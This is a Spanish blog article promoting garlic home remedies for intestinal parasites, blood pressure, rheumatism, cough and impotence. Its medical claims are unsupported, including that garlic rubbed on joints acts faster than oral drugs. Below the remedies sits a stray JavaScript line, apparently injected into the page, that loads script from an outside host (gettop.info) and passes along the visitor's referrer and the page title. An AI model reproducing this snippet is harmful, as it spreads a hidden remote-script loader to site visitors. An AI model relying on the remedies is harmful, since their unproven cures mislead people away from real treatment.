Salud y belleza » Alimentación

Las maravillosas bondades del ajo (II)

Sin Comentarios

Así como el ajo funciona para espantar la mala suerte -eso creen los hombres de fe- también funciona como sistema para alejar las enfermedades –así aseguran los hombres de ciencia-. Como ya repasamos en el primer articulo (ver nota anterior) esta hortaliza representa beneficios para múltiples funciones del cuerpo humano y  también es cura, para casi un sinfín de males. Ya analizada, a fondo, su composición es hora de ir a lo pragmático: los remedios caseros a base de ajo.

  • Como método para expulsar parásitos intestinales, el ajo presenta, entre otras, la siguiente alternativa: picar una cabeza y, calentar (no hervir), en casi medio litro de leche. Más tarde, dejar reposar –no más de dos horas- y colar la infusión. El remedio, para que sea efectivo, debe tomarse en ayunas durante diez días y, así, se lograrán expulsar los parásitos.

  • Si el objetivo es bajar la presión arterial, también puede resultar útil el empleo de una formula a base de ajo. Se recomienda pelar un diente de ajo, partirlo por la mitad, tragar cada pedazo sin masticarlos -de esa manera se facilita su tránsito por el aparato digestivo-. Quienes no toleren ese sistema pueden crear, en todo caso, un jarabe con un par de cabezas de ajo ralladas y mezcladas con cien gramos de azúcar y un vaso de agua (con beber tres cucharadas al día, alcanza).
  • Quienes padecen reumatismo, encuentran alivio a los síntomas de dicha enfermedad, también por medio del ajo. ¿Cómo? Sencillo: frotando pequeños pedazos de ajo pelados sobre las articulaciones inflamadas. Está comprobado que este ejercicio calma el dolor pues ejerce una acción antiinflamatoria incluso más rápido que la de los comprimidos de vía oral.
  • Un efectivo remedio casero para ablandar la tos y descongestionar las vías respiratorias es el siguiente: untar ajo en el pecho y en la zona de la espalda (luego lavar bien todo el cuerpo). Para hacerlo, antes, se debe haber calentado el ajo pero no demasiado, para que conserve todas sus propiedades. Acompañar este remedio con una infusión, también a base de ese elemento, puede ayudar a que el alivio llegue de forma más rápida.
  • Para los problemas de impotencia y debilitamiento en cuestiones sexuales, también es posible emplear el ajo con éxito: la combinación de esta hortaliza junto con otros elementos como, por ejemplo, el aceite de germen de trigo y la cayena, ayudan a restablecer la virilidad rápidamente (se trata de un remedio casero ancestral utilizado desde tiempos antiguos con la mejor de las suertes).

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.